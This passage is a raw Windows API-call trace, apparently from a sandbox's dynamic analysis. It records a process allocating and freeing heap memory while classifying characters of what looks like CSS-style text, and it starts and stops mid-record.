(HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x4910f8 [0113.151] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.151] IsCharAlphaNumericW (ch=0x7b) returned 0 [0113.151] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.152] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.152] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.152] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.152] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.152] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.152] IsCharAlphaNumericW (ch=0x32) returned 1 [0113.152] IsCharAlphaNumericW (ch=0x25) returned 0 [0113.152] IsCharAlphaNumericW (ch=0x25) returned 0 [0113.152] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.152] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.152] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.152] IsCharAlphaNumericW (ch=0x32) returned 1 [0113.152] IsCharAlphaNumericW (ch=0x25) returned 0 [0113.152] IsCharAlphaNumericW (ch=0x25) returned 0 [0113.152] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.152] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.152] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.152] IsCharAlphaNumericW (ch=0x30) returned 1 [0113.152] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.152] IsCharAlphaNumericW (ch=0x30) returned 1 [0113.152] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.152] IsCharAlphaNumericW (ch=0x30) returned 1 [0113.152] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.152] IsCharAlphaNumericW (ch=0x31) returned 1 [0113.152] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.153] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.153] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4ab720, Size=0x60) returned 0x4a9b10 [0113.153] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4a9b10, Size=0x90) returned 0x4c2250 [0113.153] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.153] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.153] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.153] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.153] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.153] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.153] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.153] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.153] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.153] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.153] IsCharAlphaNumericW (ch=0x35) returned 1 [0113.153] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.153] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.153] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4c2250, Size=0xd0) returned 0x4c2250 [0113.153] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.153] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.153] IsCharAlphaNumericW (ch=0x31) returned 1 [0113.153] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.153] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.154] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.154] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.154] IsCharAlphaNumericW (ch=0x23) returned 0 [0113.154] IsCharAlphaNumericW (ch=0x30) returned 1 [0113.154] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.154] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.154] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.154] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.154] IsCharAlphaNumericW (ch=0x30) returned 1 [0113.154] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.154] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.154] IsCharAlphaNumericW (ch=0x23) returned 0 [0113.154] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.154] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.154] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4c2250, Size=0x130) returned 0x4c2250 [0113.154] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.154] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.154] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.154] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.154] IsCharAlphaNumericW (ch=0x7d) returned 0 [0113.154] IsCharAlphaNumericW (ch=0x23) returned 0 [0113.154] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4bd5f8 [0113.155] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x4910f8 [0113.155] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.155] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.155] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.155] IsCharAlphaNumericW (ch=0x23) returned 0 [0113.155] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4bd638 [0113.155] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x4910f8 [0113.155] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.155] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.155] IsCharAlphaNumericW (ch=0x7b) returned 0 [0113.155] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.155] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.155] IsCharAlphaNumericW (ch=0x23) returned 0 [0113.155] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.155] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.155] IsCharAlphaNumericW (ch=0x7d) returned 0 [0113.155] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x48ed10, Size=0x4c) returned 0x4910f8 [0113.155] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x4bab10 [0113.155] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4bd698 [0113.155] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab768 [0113.155] IsCharAlphaNumericW (ch=0x23) returned 0 [0113.155] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4bd6b8 [0113.155] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x491150 [0113.155] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.155] IsCharSpaceW (wch=0x20) returned 1 [0113.156] IsCharSpaceW (wch=0x7b) returned 0 [0113.156] IsCharSpaceW (wch=0x20) returned 1 [0113.156] IsCharAlphaNumericW (ch=0x7b) returned 0 [0113.156] IsCharSpaceW (wch=0xd) returned 1 [0113.156] IsCharSpaceW (wch=0xd) returned 1 [0113.156] IsCharSpaceW (wch=0xa) returned 1 [0113.156] IsCharSpaceW (wch=0x20) returned 1 [0113.156] IsCharSpaceW (wch=0x64) returned 0 [0113.156] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x491150 | out: hHeap=0x450000) returned 1 [0113.156] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.156] IsCharSpaceW (wch=0x3a) returned 0 [0113.156] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x4c23c8 [0113.156] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.156] IsCharSpaceW (wch=0x20) returned 1 [0113.156] IsCharSpaceW (wch=0x6e) returned 0 [0113.156] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.156] IsCharSpaceW (wch=0x3b) returned 0 [0113.156] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.156] IsCharSpaceW (wch=0xd) returned 1 [0113.156] IsCharSpaceW (wch=0xd) returned 1 [0113.156] IsCharSpaceW (wch=0xa) returned 1 [0113.156] IsCharSpaceW (wch=0x20) returned 1 [0113.156] IsCharSpaceW (wch=0xd) returned 1 [0113.157] IsCharSpaceW (wch=0xd) returned 1 [0113.157] IsCharSpaceW (wch=0xa) returned 1 [0113.157] IsCharSpaceW (wch=0x20) returned 1 [0113.157] IsCharSpaceW (wch=0x62) returned 0 [0113.157] IsCharSpaceW (wch=0x65) returned 0 [0113.157] IsCharSpaceW (wch=0x6e) returned 0 [0113.157] IsCharSpaceW (wch=0x6e) returned 0 [0113.157] IsCharSpaceW (wch=0x65) returned 0 [0113.157] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4bd6d8 [0113.157] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab7b0 [0113.157] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.157] IsCharSpaceW (wch=0x20) returned 1 [0113.157] IsCharSpaceW (wch=0x3a) returned 0 [0113.157] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.157] IsCharSpaceW (wch=0x20) returned 1 [0113.158] IsCharSpaceW (wch=0x23) returned 0 [0113.158] IsCharAlphaNumericW (ch=0x23) returned 0 [0113.158] IsCharAlphaNumericW (ch=0x30) returned 1 [0113.158] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.158] IsCharSpaceW (wch=0x3b) returned 0 [0113.158] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.158] IsCharSpaceW (wch=0xd) returned 1 [0113.158] IsCharSpaceW (wch=0xd) returned 1 [0113.158] IsCharSpaceW (wch=0xa) returned 1 [0113.158] IsCharSpaceW (wch=0x20) returned 1 [0113.158] IsCharSpaceW (wch=0x70) returned 0 [0113.158] IsCharSpaceW (wch=0x37) returned 0 [0113.158] IsCharSpaceW (wch=0x23) returned 0 [0113.158] IsCharSpaceW (wch=0x23) returned 0 [0113.158] IsCharSpaceW (wch=0x37) returned 0 [0113.159] IsCharSpaceW (wch=0x23) returned 0 [0113.159] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.159] IsCharSpaceW (wch=0x3a) returned 0 [0113.159] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.159] IsCharSpaceW (wch=0x20) returned 1 [0113.159] IsCharSpaceW (wch=0x66) returned 0 [0113.159] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.159] IsCharSpaceW (wch=0x3b) returned 0 [0113.159] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.159] IsCharSpaceW (wch=0xd) returned 1 [0113.159] IsCharSpaceW (wch=0xd) returned 1 [0113.159] IsCharSpaceW (wch=0xa) returned 1 [0113.159] IsCharSpaceW (wch=0x20) returned 1 [0113.160] IsCharSpaceW (wch=0x77) returned 0 [0113.160] IsCharSpaceW (wch=0x64) returned 0 [0113.160] IsCharSpaceW (wch=0x66) returned 0 [0113.160] IsCharSpaceW (wch=0x66) returned 0 [0113.160] IsCharSpaceW (wch=0x64) returned 0 [0113.160] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.160] IsCharSpaceW (wch=0x3a) returned 0 [0113.160] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.160] IsCharSpaceW (wch=0x20) returned 1 [0113.160] IsCharSpaceW (wch=0x31) returned 0 [0113.160] IsCharAlphaNumericW (ch=0x31) returned 1 [0113.160] IsCharAlphaNumericW (ch=0x25) returned 0 [0113.160] IsCharSpaceW (wch=0x25) returned 0 [0113.160] IsCharAlphaNumericW (ch=0x25) returned 0 [0113.160] IsCharSpaceW (wch=0x3b) returned 0 [0113.161] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.161] IsCharSpaceW (wch=0xd) returned 1 [0113.161] IsCharSpaceW (wch=0xd) returned 1 [0113.161] IsCharSpaceW (wch=0xa) returned 1 [0113.161] IsCharSpaceW (wch=0x20) returned 1 [0113.161] IsCharSpaceW (wch=0x68) returned 0 [0113.161] IsCharSpaceW (wch=0x25) returned 0 [0113.161] IsCharSpaceW (wch=0x31) returned 0 [0113.161] IsCharSpaceW (wch=0x31) returned 0 [0113.161] IsCharSpaceW (wch=0x25) returned 0 [0113.161] IsCharSpaceW (wch=0x31) returned 0 [0113.161] IsCharSpaceW (wch=0x25) returned 0 [0113.161] IsCharSpaceW (wch=0x0) returned 0 [0113.161] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.161] IsCharSpaceW (wch=0x3a) returned 0 [0113.161] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.161] IsCharSpaceW (wch=0x20) returned 1 [0113.161] IsCharSpaceW (wch=0x37) returned 0 [0113.161] IsCharAlphaNumericW (ch=0x37) returned 1 [0113.161] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.161] IsCharSpaceW (wch=0x3b) returned 0 [0113.161] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.161] IsCharSpaceW (wch=0xd) returned 1 [0113.162] IsCharSpaceW (wch=0xd) returned 1 [0113.162] IsCharSpaceW (wch=0xa) returned 1 [0113.162] IsCharSpaceW (wch=0x20) returned 1 [0113.162] IsCharSpaceW (wch=0x74) returned 0 [0113.162] IsCharSpaceW (wch=0x78) returned 0 [0113.162] IsCharSpaceW (wch=0x37) returned 0 [0113.162] IsCharSpaceW (wch=0x37) returned 0 [0113.162] IsCharSpaceW (wch=0x78) returned 0 [0113.162] IsCharSpaceW (wch=0x37) returned 0 [0113.162] IsCharSpaceW (wch=0x70) returned 0 [0113.162] IsCharSpaceW (wch=0x78) returned 0 [0113.162] IsCharSpaceW (wch=0x0) returned 0 [0113.162] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4ab7b0, Size=0x60) returned 0x4a9b10 [0113.162] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.162] IsCharSpaceW (wch=0x3a) returned 0 [0113.162] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.162] IsCharSpaceW (wch=0x20) returned 1 [0113.162] IsCharSpaceW (wch=0x61) returned 0 [0113.162] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.162] IsCharSpaceW (wch=0x3b) returned 0 [0113.162] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.162] IsCharSpaceW (wch=0xd) returned 1 [0113.162] IsCharSpaceW (wch=0xd) returned 1 [0113.162] IsCharSpaceW (wch=0xa) returned 1 [0113.162] IsCharSpaceW (wch=0x20) returned 1 [0113.162] IsCharSpaceW (wch=0x72) returned 0 [0113.162] IsCharSpaceW (wch=0x6f) returned 0 [0113.162] IsCharSpaceW (wch=0x61) returned 0 [0113.163] IsCharSpaceW (wch=0x61) returned 0 [0113.163] IsCharSpaceW (wch=0x6f) returned 0 [0113.163] IsCharSpaceW (wch=0x61) returned 0 [0113.163] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.163] IsCharSpaceW (wch=0x3a) returned 0 [0113.163] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.163] IsCharSpaceW (wch=0x20) returned 1 [0113.163] IsCharSpaceW (wch=0x30) returned 0 [0113.163] IsCharAlphaNumericW (ch=0x30) returned 1 [0113.163] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.163] IsCharSpaceW (wch=0x3b) returned 0 [0113.163] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.163] IsCharSpaceW (wch=0xd) returned 1 [0113.163] IsCharSpaceW (wch=0xd) returned 1 [0113.163] IsCharSpaceW (wch=0xa) returned 1 [0113.163] IsCharSpaceW (wch=0x20) returned 1 [0113.163] IsCharSpaceW (wch=0x62) returned 0 [0113.163] IsCharSpaceW (wch=0x30) returned 0 [0113.163] IsCharSpaceW (wch=0x30) returned 0 [0113.163] IsCharSpaceW (wch=0x30) returned 0 [0113.163] IsCharSpaceW (wch=0x30) returned 0 [0113.163] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4a9b10, Size=0x90) returned 0x4c2b88 [0113.163] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.163] IsCharSpaceW (wch=0x3a) returned 0 [0113.164] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.164] IsCharSpaceW (wch=0x20) returned 1 [0113.164] IsCharSpaceW (wch=0x30) returned 0 [0113.164] IsCharAlphaNumericW (ch=0x30) returned 1 [0113.164] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.164] IsCharSpaceW (wch=0x3b) returned 0 [0113.164] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.164] IsCharSpaceW (wch=0xd) returned 1 [0113.164] IsCharSpaceW (wch=0xd) returned 1 [0113.164] IsCharSpaceW (wch=0xa) returned 1 [0113.164] IsCharSpaceW (wch=0x20) returned 1 [0113.164] IsCharSpaceW (wch=0x6d) returned 0 [0113.164] IsCharSpaceW (wch=0x30) returned 0 [0113.164] IsCharSpaceW (wch=0x30) returned 0 [0113.164] IsCharSpaceW (wch=0x30) returned 0 [0113.164] IsCharSpaceW (wch=0x30) returned 0 [0113.164] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.164] IsCharSpaceW (wch=0x20) returned 1 [0113.164] IsCharSpaceW (wch=0x3a) returned 0 [0113.164] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.164] IsCharSpaceW (wch=0x20) returned 1 [0113.164] IsCharSpaceW (wch=0x31) returned 0 [0113.164] IsCharAlphaNumericW (ch=0x31) returned 1 [0113.164] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.164] IsCharSpaceW (wch=0x3b) returned 0 [0113.164] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.164] IsCharSpaceW (wch=0xd) returned 1 [0113.164] IsCharSpaceW (wch=0xd) returned 1 [0113.165] IsCharSpaceW (wch=0xa) returned 1 [0113.165] IsCharSpaceW (wch=0x20) returned 1 [0113.165] IsCharSpaceW (wch=0x62) returned 0 [0113.165] IsCharSpaceW (wch=0x78) returned 0 [0113.165] IsCharSpaceW (wch=0x31) returned 0 [0113.165] IsCharSpaceW (wch=0x31) returned 0 [0113.165] IsCharSpaceW (wch=0x78) returned 0 [0113.165] IsCharSpaceW (wch=0x31) returned 0 [0113.165] IsCharSpaceW (wch=0x70) returned 0 [0113.165] IsCharSpaceW (wch=0x78) returned 0 [0113.165] IsCharSpaceW (wch=0x0) returned 0 [0113.165] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.166] IsCharSpaceW (wch=0x20) returned 1 [0113.166] IsCharSpaceW (wch=0x3a) returned 0 [0113.166] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.166] IsCharSpaceW (wch=0x20) returned 1 [0113.166] IsCharSpaceW (wch=0x32) returned 0 [0113.166] IsCharAlphaNumericW (ch=0x32) returned 1 [0113.166] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.166] IsCharSpaceW (wch=0x20) returned 1 [0113.166] IsCharSpaceW (wch=0x73) returned 0 [0113.166] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.166] IsCharSpaceW (wch=0x20) returned 1 [0113.166] IsCharSpaceW (wch=0x23) returned 0 [0113.166] IsCharAlphaNumericW (ch=0x23) returned 0 [0113.166] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.167] IsCharSpaceW (wch=0x3b) returned 0 [0113.167] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.167] IsCharSpaceW (wch=0xd) returned 1 [0113.167] IsCharSpaceW (wch=0xd) returned 1 [0113.167] IsCharSpaceW (wch=0xa) returned 1 [0113.167] IsCharSpaceW (wch=0x20) returned 1 [0113.167] IsCharSpaceW (wch=0x7d) returned 0 [0113.167] IsCharSpaceW (wch=0x63) returned 0 [0113.167] IsCharSpaceW (wch=0x32) returned 0 [0113.167] IsCharSpaceW (wch=0x32) returned 0 [0113.167] IsCharSpaceW (wch=0x63) returned 0 [0113.167] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x4c01c0 [0113.167] IsCharSpaceW (wch=0x32) returned 0 [0113.167] IsCharSpaceW (wch=0x32) returned 0 [0113.167] IsCharSpaceW (wch=0x70) returned 0 [0113.167] IsCharSpaceW (wch=0x78) returned 0 [0113.167] IsCharSpaceW (wch=0x20) returned 1 [0113.167] IsCharSpaceW (wch=0x32) returned 0 [0113.167] IsCharSpaceW (wch=0x70) returned 0 [0113.167] IsCharSpaceW (wch=0x78) returned 0 [0113.167] IsCharSpaceW (wch=0x0) returned 0 [0113.167] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4c2b88, Size=0xd0) returned 0x4c2b88 [0113.167] IsCharSpaceW (wch=0x73) returned 0 [0113.167] IsCharSpaceW (wch=0x73) returned 0 [0113.167] IsCharSpaceW (wch=0x6f) returned 0 [0113.167] IsCharSpaceW (wch=0x6c) returned 0 [0113.167] IsCharSpaceW (wch=0x69) returned 0 [0113.167] IsCharSpaceW (wch=0x64) returned 0 [0113.167] IsCharSpaceW (wch=0x20) returned 1 [0113.168] IsCharSpaceW (wch=0x23) returned 0 [0113.168] IsCharSpaceW (wch=0x23) returned 0 [0113.168] IsCharSpaceW (wch=0x63) returned 0 [0113.168] IsCharSpaceW (wch=0x63) returned 0 [0113.168] IsCharSpaceW (wch=0x63) returned 0 [0113.168] IsCharSpaceW (wch=0x63) returned 0 [0113.168] IsCharSpaceW (wch=0x63) returned 0 [0113.168] IsCharSpaceW (wch=0x63) returned 0 [0113.168] IsCharSpaceW (wch=0x23) returned 0 [0113.168] IsCharSpaceW (wch=0x23) returned 0 [0113.168] IsCharSpaceW (wch=0x23) returned 0 [0113.168] IsCharAlphaNumericW (ch=0x7d) returned 0 [0113.168] IsCharSpaceW (wch=0xd) returned 1 [0113.168] IsCharSpaceW (wch=0xd) returned 1 [0113.168] IsCharSpaceW (wch=0xa) returned 1 [0113.168] IsCharSpaceW (wch=0x20) returned 1 [0113.168] IsCharSpaceW (wch=0x23) returned 0 [0113.168] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4ba100 [0113.168] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x4) returned 0x4a70d0 [0113.168] IsCharAlphaNumericW (ch=0x23) returned 0 [0113.168] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4bd6f8 [0113.168] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x491150 [0113.168] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.168] IsCharSpaceW (wch=0x20) returned 1 [0113.168] IsCharSpaceW (wch=0x68) returned 0 [0113.169] IsCharSpaceW (wch=0x20) returned 1 [0113.169] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.169] IsCharSpaceW (wch=0x20) returned 1 [0113.169] IsCharSpaceW (wch=0x7b) returned 0 [0113.169] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x491150 | out: hHeap=0x450000) returned 1 [0113.169] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4c2c78 [0113.169] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x491150 [0113.169] IsCharSpaceW (wch=0x20) returned 1 [0113.169] IsCharAlphaNumericW (ch=0x7b) returned 0 [0113.169] IsCharSpaceW (wch=0xd) returned 1 [0113.169] IsCharSpaceW (wch=0xd) returned 1 [0113.169] IsCharSpaceW (wch=0xa) returned 1 [0113.169] IsCharSpaceW (wch=0x74) returned 0 [0113.169] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x491150 | out: hHeap=0x450000) returned 1 [0113.169] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.169] IsCharSpaceW (wch=0x3a) returned 0 [0113.169] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x4c23f0 [0113.170] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.170] IsCharSpaceW (wch=0x20) returned 1 [0113.170] IsCharSpaceW (wch=0x63) returned 0 [0113.170] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.170] IsCharSpaceW (wch=0x3b) returned 0 [0113.170] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.170] IsCharSpaceW (wch=0xd) returned 1 [0113.170] IsCharSpaceW (wch=0xd) returned 1 [0113.170] IsCharSpaceW (wch=0xa) returned 1 [0113.170] IsCharSpaceW (wch=0x66) returned 0 [0113.170] IsCharSpaceW (wch=0x72) returned 0 [0113.170] IsCharSpaceW (wch=0x63) returned 0 [0113.170] IsCharSpaceW (wch=0x63) returned 0 [0113.170] IsCharSpaceW (wch=0x72) returned 0 [0113.170] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4c2c98 [0113.170] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab7b0 [0113.170] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.170] IsCharSpaceW (wch=0x3a) returned 0 [0113.170] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.170] IsCharSpaceW (wch=0x32) returned 0 [0113.170] IsCharSpaceW (wch=0x2e) returned 0 [0113.170] IsCharSpaceW (wch=0x3b) returned 0 [0113.170] IsCharSpaceW (wch=0xd) returned 1 [0113.170] IsCharSpaceW (wch=0xd) returned 1 [0113.170] IsCharSpaceW (wch=0xa) returned 1 [0113.170] IsCharSpaceW (wch=0x66) returned 0 [0113.170] IsCharSpaceW (wch=0x74) returned 0 [0113.171] IsCharSpaceW (wch=0x32) returned 0 [0113.171] IsCharSpaceW (wch=0x32) returned 0 [0113.171] IsCharSpaceW (wch=0x74) returned 0 [0113.171] IsCharSpaceW (wch=0x32) returned 0 [0113.171] IsCharSpaceW (wch=0x70) returned 0 [0113.171] IsCharSpaceW (wch=0x74) returned 0 [0113.171] IsCharSpaceW (wch=0x0) returned 0 [0113.171] IsCharSpaceW (wch=0x3a) returned 0 [0113.171] IsCharSpaceW (wch=0x20) returned 1 [0113.171] IsCharSpaceW (wch=0x50) returned 0 [0113.171] IsCharSpaceW (wch=0x20) returned 1 [0113.171] IsCharSpaceW (wch=0x4c) returned 0 [0113.171] IsCharSpaceW (wch=0x2c) returned 0 [0113.171] IsCharSpaceW (wch=0x20) returned 1 [0113.171] IsCharSpaceW (wch=0x73) returned 0 [0113.171] IsCharSpaceW (wch=0x3b) returned 0 [0113.171] IsCharSpaceW (wch=0xd) returned 1 [0113.171] IsCharSpaceW (wch=0xd) returned 1 [0113.171] IsCharSpaceW (wch=0xa) returned 1 [0113.171] IsCharSpaceW (wch=0x63) returned 0 [0113.171] IsCharSpaceW (wch=0x66) returned 0 [0113.171] IsCharSpaceW (wch=0x50) returned 0 [0113.171] IsCharSpaceW (wch=0x50) returned 0 [0113.172] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4ab7b0, Size=0x60) returned 0x4a9b10 [0113.174] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4bfe00, Size=0xe4) returned 0x4a2290 [0113.174] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x491150 [0113.174] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x491150 | out: hHeap=0x450000) returned 1 [0113.174] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.174] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x491150 [0113.174] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x491150 | out: hHeap=0x450000) returned 1 [0113.174] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.175] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x491150 [0113.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x491150 | out: hHeap=0x450000) returned 1 [0113.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.175] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x491150 [0113.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x491150 | out: hHeap=0x450000) returned 1 [0113.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.175] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x491150 [0113.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x491150 | out: hHeap=0x450000) returned 1 [0113.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.175] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x491150 [0113.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x491150 | out: hHeap=0x450000) returned 1 [0113.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.175] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x491150 [0113.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x491150 | out: hHeap=0x450000) returned 1 [0113.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.175] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x491150 [0113.175] HeapFree (in: 